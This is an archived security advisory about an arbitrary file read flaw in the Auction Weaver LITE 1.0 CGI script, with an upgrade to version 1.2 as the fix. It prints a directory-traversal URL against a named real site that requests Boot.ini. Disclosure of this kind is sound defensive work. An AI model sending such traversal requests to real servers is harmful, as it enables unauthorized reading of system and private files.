AOH :: Web :: e-commerce, shopping carts

AOH :: Web :: e-commerce, shopping carts :: WEAVER1.HTM
Auction Weaver Read Arbitrary Files

Vulnerability

    Auction Weaver

Affected

    Auction WeaverT LITE 1.0

Description

    Meliksah  Ozoral  found  following.   Auction  Weaver allow you to
    read files from server.  Remote users can view source of files  on
    server.

        http://www.cgiscriptcenter.com/cgi-bin/awl/auctionweaver.pl?flag1=1&catdir=cat17&fromfile=967251278%2Edat
        http://www.cgiscriptcenter.com/cgi-bin/awl/auctionweaver.pl?flag1=1&catdir=\..\..\..\..\..\..\..\..\&fromfile=Boot.ini

Solution

	Upgrade to 1.2.

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better). Site design & layout copyright © 1986-2009 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.